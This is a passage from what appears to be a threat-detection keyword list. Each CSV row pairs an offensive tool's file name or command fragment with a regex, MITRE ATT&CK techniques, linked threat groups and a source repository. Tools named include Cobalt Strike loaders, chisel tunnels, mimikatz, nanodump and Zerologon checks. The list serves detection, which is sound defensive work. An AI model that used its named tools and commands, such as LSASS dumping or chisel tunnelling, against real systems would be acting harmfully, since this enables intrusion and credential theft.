proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/BokuLoader","1","1","N/A","N/A","10","10","1312","255","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z","38146" "*check_cve-2020-1472.py*",".{0,1000}check_cve\-2020\-1472\.py.{0,1000}","offensive_tool_keyword","POC","Zerologon CVE exploitation","T1210 - T1072","TA0006 - TA0008","N/A","Dispossessor","Exploitation tool","https://github.com/WiIs0n/Zerologon_CVE-2020-1472","1","1","N/A","N/A","N/A","1","11","5","2020-10-05T07:47:02Z","2020-09-29T18:45:44Z","38147" "*check_function ntdll.dll 
EtwEventWrite*",".{0,1000}check_function\sntdll\.dll\sEtwEventWrite.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","0","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","38148" "*check_ppl_requirements*",".{0,1000}check_ppl_requirements.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","38149" "*check_sudo_nopasswd_binaries(*",".{0,1000}check_sudo_nopasswd_binaries\(.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","#content #linux","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","38150" "*checkIfHiddenAPICall*",".{0,1000}checkIfHiddenAPICall.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik 
Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","N/A","10","10","964","143","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z","38151" "*Check-LocalAdminHash.ps1*",".{0,1000}Check\-LocalAdminHash\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","38152" "*CheckPort.csproj*",".{0,1000}CheckPort\.csproj.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. 
More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","Dispossessor","Exploitation tool","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","N/A","10","907","125","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z","38153" "*CheckSMBSigning -Targets *",".{0,1000}CheckSMBSigning\s\-Targets\s.{0,1000}","offensive_tool_keyword","CheckSMBSigning","Checks for SMB signing disabled on all hosts in the network","T1018 - T1550","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Leo4j/CheckSMBSigning","1","0","N/A","N/A","6","1","8","1","2023-10-13T11:55:33Z","2023-05-17T11:47:52Z","38154" "*CheeseDCOM.exe*",".{0,1000}CheeseDCOM\.exe.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","1","N/A","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","38155" "*CheeseExec.csproj*",".{0,1000}CheeseExec\.csproj.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","1","N/A","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","38156" "*CheeseExec.exe*",".{0,1000}CheeseExec\.exe.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","1","N/A","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","38157" "*CheesePS.csproj*",".{0,1000}CheesePS\.csproj.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral 
Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","1","N/A","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","38158" "*CheesePS.exe*",".{0,1000}CheesePS\.exe.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","1","N/A","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","38159" "*CheeseRDP.exe*",".{0,1000}CheeseRDP\.exe.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","1","N/A","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","38160" "*CheeseSQL.exe*",".{0,1000}CheeseSQL\.exe.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","1","N/A","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","38161" "*CheeseTools.sln*",".{0,1000}CheeseTools\.sln.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","1","N/A","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","38162" "*CheeseTools-master*",".{0,1000}CheeseTools\-master.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral 
Movement","https://github.com/klezVirus/CheeseTools","1","1","N/A","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","38163" "*cheetah.py -*",".{0,1000}cheetah\.py\s\-.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","0","N/A","N/A","10","7","630","150","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z","38164" "*chenjiandongx/sniffer*",".{0,1000}chenjiandongx\/sniffer.{0,1000}","offensive_tool_keyword","sniffer","A modern alternative network traffic sniffer.","T1040 - T1052.001 - T1046 - T1552.002","TA0011 - TA0007 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/chenjiandongx/sniffer","1","1","N/A","N/A","N/A","8","769","67","2024-03-02T07:48:19Z","2021-11-08T15:36:03Z","38165" "*Chimera-main.zip*",".{0,1000}Chimera\-main\.zip.{0,1000}","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","1","N/A","N/A","9","5","469","56","2023-12-19T22:58:03Z","2023-05-15T13:02:54Z","38168" "*Chimera-master.zip*",".{0,1000}Chimera\-master\.zip.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","N/A","10","10","1493","252","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z","38169" "*chisel -*",".{0,1000}chisel\s\-.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - 
KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","38171" "*chisel client -*",".{0,1000}chisel\sclient\s\-.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","38172" "*chisel client http*",".{0,1000}chisel\sclient\shttp.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","38173" "*chisel server -*",".{0,1000}chisel\sserver\s\-.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","38174" "*chisel.exe *",".{0,1000}chisel\.exe\s.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Chisel proxying - on our compromised target system we connect to this server and tell it to proxy all traffic over it via the reverse SOCKS5 tunnel.","T1071 - T1090 - T1102","N/A","N/A","Black Basta","C2","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","38176" "*chisel.exe 
client*",".{0,1000}chisel\.exe\sclient.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","N/A","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","38177" "*chisel.exe server*",".{0,1000}chisel\.exe\sserver.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","N/A","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","38178" "*chisel.jpillora.com*",".{0,1000}chisel\.jpillora\.com.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","1","N/A","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","38179" "*chisel_1*_darwin_*.gz*",".{0,1000}chisel_1.{0,1000}_darwin_.{0,1000}\.gz.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#linux","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","38180" "*chisel_1*_linux_*.gz*",".{0,1000}chisel_1.{0,1000}_linux_.{0,1000}\.gz.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - 
KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#linux","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","38181" "*chisel_linux_amd64*",".{0,1000}chisel_linux_amd64.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","1","#linux","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","38182" "*chisel_windows_amd64.exe*",".{0,1000}chisel_windows_amd64\.exe.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","1","N/A","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","38183" "*chisel-master.zip*",".{0,1000}chisel\-master\.zip.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","1","N/A","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","38184" "*chknull.zip*",".{0,1000}chknull\.zip.{0,1000}","offensive_tool_keyword","ChkNull","Checks for Users with No passwords","T1078 - T1201","TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/classic_hacking_tools","1","1","N/A","N/A","N/A","1","4","1","2024-06-27T09:35:42Z","2023-04-16T01:49:12Z","38187" "*chmod +x /usr/lib/systemd/system-generators/makecon*",".{0,1000}chmod\s\+x\s\/usr\/lib\/systemd\/system\-generators\/makecon.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 
- T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","38188" "*chmod +x dirty*",".{0,1000}chmod\s\+x\sdirty.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1533","TA0003","N/A","N/A","Exploitation tool","https://github.com/febinrev/dirtypipez-exploit","1","0","#linux","N/A","N/A","1","51","22","2022-03-08T11:52:22Z","2022-03-08T11:49:40Z","38189" "*chmod +x evil.php*",".{0,1000}chmod\s\+x\sevil\.php.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","#linux","N/A","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","38190" "*chmod +x pwnkit*",".{0,1000}chmod\s\+x\spwnkit.{0,1000}","offensive_tool_keyword","Gecko","Gecko Backdoor is a web php backdoor","T1100 - T1059 - T1105 - T1203","TA0011 - TA0003","N/A","N/A","C2","https://github.com/MadExploits/Gecko","1","0","#linux","N/A","10","10","118","56","2025-02-08T17:50:28Z","2022-07-15T05:51:04Z","38191" "*chmod +x XiebroC2MAc*",".{0,1000}chmod\s\+x\sXiebroC2MAc.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","#linux","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","38192" "*chmod 666 /var/run/utmp~*",".{0,1000}chmod\s666\s\/var\/run\/utmp\~.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file Anti 
forensic: Manipulate utmp","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Defense Evasion","https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON","1","0","#linux","N/A","N/A","10","4124","2071","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z","38194" "*chmod 700 lse.sh*",".{0,1000}chmod\s700\slse\.sh.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","#linux","N/A","9","10","3575","584","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z","38196" "*chmod 700 nscd crond*",".{0,1000}chmod\s700\snscd\scrond.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers - EncTelnet/Poptop To use Nopen over an existing connection","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/thePevertedSpartan/EQ1/blob/0c2354ff1073099b2aa417030b3167ec29d7279c/Linux/doc/old/etc/user.tool.poptop.COMMON","1","0","#linux","N/A","N/A","1","0","1","2017-11-12T08:13:06Z","2017-11-12T08:10:08Z","38197" "*chmod 755 lse.sh*",".{0,1000}chmod\s755\slse\.sh.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","#linux","N/A","9","10","3575","584","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z","38198" "*chmod 755 msfinstall*",".{0,1000}chmod\s755\smsfinstall.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#linux","https://x.com/mthcht/status/1827714529687658796","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","38199" "*chntpw Edit User Info & Passwords*",".{0,1000}chntpw\sEdit\sUser\sInfo\s\&\sPasswords.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","38200" "*chntpw.com/download*",".{0,1000}chntpw\.com\/download.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","38201" "*chntpw.static*",".{0,1000}chntpw\.static.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential 
Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","38202" "*choco install * common.fireeye*",".{0,1000}choco\sinstall\s.{0,1000}\scommon\.fireeye.{0,1000}","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","0","N/A","N/A","N/A","10","7168","1313","2024-09-24T19:14:18Z","2019-03-26T22:36:32Z","38203" "*chocobo_root.c",".{0,1000}chocobo_root\.c","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","38207" "*chocolate.kirbi*",".{0,1000}chocolate\.kirbi.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","38208" 
